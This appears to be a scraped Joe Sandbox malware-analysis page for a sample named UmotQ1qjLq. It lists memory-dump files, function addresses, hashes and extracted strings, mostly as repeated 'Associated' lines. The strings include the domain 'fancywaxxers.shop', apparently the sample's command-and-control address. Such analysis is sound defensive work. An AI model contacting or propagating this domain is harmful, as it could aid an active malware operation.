Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: AllocateHeapInitializeThunk
String ID: !@$,$0$1$=$?$@$B$T$V$W
API String ID: 383220839-2565976686
Opcode ID: 2dc046b9eadde4e6f16a56ace06b7aeae89fef31bab7325f654fc720a8d856e6
Instruction ID: c33913120003a18c0fd8cde9ac3fc0fa942db3a7d05d4793e32a879d872a5bca
Opcode Fuzzy Hash: 2dc046b9eadde4e6f16a56ace06b7aeae89fef31bab7325f654fc720a8d856e6
Instruction Fuzzy Hash: 2132C27160C7808FD3148B6CC8813AFBBE5ABD5314F298DADE5D587392D6B98845CB43

Function 00B1DE48 Relevance: 12.3, APIs: 1, Strings: 7, Instructions: 339
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoUninitialize.COMBASE ref: 00B1DE55

Strings

iped, xrefs: 00B1DF46
wtf|, xrefs: 00B1DF3B
T_RE, xrefs: 00B1DF67
.a]b, xrefs: 00B1E07E
fancywaxxers.shop, xrefs: 00B1E2A0
GK8m, xrefs: 00B1DE73
LM, xrefs: 00B1E23C

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID: Uninitialize
String ID: .a]b$GK8m$LM$T_RE$fancywaxxers.shop$iped$wtf|
API String ID: 3861434553-2559626107
Opcode ID: 02f5683172b307cedbf2ddf6ac9c3c7b5cc8c9540154e7d5950f886feec945eb
Instruction ID: 308a76dc3df7833ad4621163f7ab83be7801dcfb8e8614d9a67d8440667ab8af
Opcode Fuzzy Hash: 02f5683172b307cedbf2ddf6ac9c3c7b5cc8c9540154e7d5950f886feec945eb
Instruction Fuzzy Hash: D9B123716483D18BC335CF29C8913EFBBE1EBD7310F0889ADD4E95B242C67985468B92

Function 00B3238D Relevance: 11.8, Strings: 9, Instructions: 549
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

?', xrefs: 00B324CF
Z_-c, xrefs: 00B325A0
%<$, xrefs: 00B324BF
gM, xrefs: 00B3252D
OIE{, xrefs: 00B32588
(99#, xrefs: 00B324B7
-A+, xrefs: 00B324AF
~|, xrefs: 00B32736
fancywaxxers.shop, xrefs: 00B3281F

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: %<$$(99#$OIE{$Z_-c$fancywaxxers.shop$gM$-A+$~|$?'
API String ID: 0-269468562
Opcode ID: 6c33f1033c77c308cd5143da1d811bdbd7295b52eeaf1e75dbacbab0bac36b8a
Instruction ID: 03b61e9e92ea2e5d68c7c4f64aa052eb1f117e4b0efbc4265efc87b323b9b2f6
Opcode Fuzzy Hash: 6c33f1033c77c308cd5143da1d811bdbd7295b52eeaf1e75dbacbab0bac36b8a
Instruction Fuzzy Hash: 34025A716183918FD318CF25C89176BBBE2FFD2314F288AACE4D59B295D7758805CB82

Function 00B195A0 Relevance: 9.1, Strings: 7, Instructions: 320
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

4691EE6292D86A4A20A4C476FD51BCB1, xrefs: 00B1964D
m, xrefs: 00B19613
T, xrefs: 00B19675
t{, xrefs: 00B197FF
fg, xrefs: 00B19913
96, xrefs: 00B19867
ec, xrefs: 00B197F7

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: 4691EE6292D86A4A20A4C476FD51BCB1$96$ec$fg$m$t{$T
API String ID: 0-591456167
Opcode ID: 394dd33a9465ffead6b2c918917e1b7c7123fed1ba67e4b979c907d3fcefd3f7
Instruction ID: ef98169fc65c8ffa9f726e97918032fd748a8f5d5132e9aaf37c2607179e90fb
Opcode Fuzzy Hash: 394dd33a9465ffead6b2c918917e1b7c7123fed1ba67e4b979c907d3fcefd3f7
Instruction Fuzzy Hash: 58A1E5B01083808BD714DF65C8A5AABBFE5EBC2354F54496DE0D28B392D738C54ACB56

Function 00B329CD Relevance: 6.3, APIs: 2, Strings: 1, Instructions: 1009
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

7x~, xrefs: 00B334C1

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156098895.0000000000CCC000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156187671.0000000000CE6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156235311.0000000000CE7000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156291158.0000000000CF1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156388174.0000000000CF6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156448555.0000000000CF8000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156478398.0000000000CFA000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156569026.0000000000CFB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156609191.0000000000CFD000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156644837.0000000000CFE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156681979.0000000000D0E000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156704242.0000000000D10000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156765134.0000000000D2B000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156792476.0000000000D35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156823422.0000000000D53000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156854212.0000000000D54000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156881329.0000000000D55000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156984220.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157138534.0000000000D66000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157165854.0000000000D6A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157193891.0000000000D72000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157217637.0000000000D74000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157245012.0000000000D75000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157273076.0000000000D78000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157297581.0000000000D80000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157321650.0000000000D85000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157362765.0000000000D86000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157397905.0000000000D87000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157422436.0000000000D88000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157443972.0000000000D8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157468521.0000000000D92000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157491501.0000000000D94000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157521040.0000000000DA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DA2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157540739.0000000000DD2000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157601246.0000000000DE9000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157622775.0000000000DEB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157648598.0000000000DFB000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157677038.0000000000DFD000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000DFE000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157712690.0000000000E09000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157766413.0000000000E17000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157787690.0000000000E18000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b10000_UmotQ1qjLq.jbxd

Similarity

API ID:
String ID: 7x~
API String ID: 0-3352779061
Opcode ID: 5f1b35e14e47136ae95f5033d2d77d43d1c5070adbca1d57948351c83dc85de6
Instruction ID: ccb91907f9d7683b9918f139dd4c7ee6e265cae88e72bc0545c399c6e98d7a91
Opcode Fuzzy Hash: 5f1b35e14e47136ae95f5033d2d77d43d1c5070adbca1d57948351c83dc85de6
Instruction Fuzzy Hash: BB723472A18301CFD714CF68EC917AAB7F2FF85311F1985A8E945AB391EB349901CB91

Function 00B33120 Relevance: 5.8, APIs: 2, Strings: 1, Instructions: 535
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00B331F3
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 00B332A2

Strings

7x~, xrefs: 00B334C1

Memory Dump Source

Source File: 00000000.00000002.2155648820.0000000000B11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B10000, based on PE: true

Associated: 00000000.00000002.2155621329.0000000000B10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155648820.0000000000B55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155730470.0000000000B65000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155756949.0000000000B6F000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155784946.0000000000B70000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2155814151.0000000000B71000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156073865.0000000000CC9000.00000040.00000001.01000000.00000003.sdmpDownload File
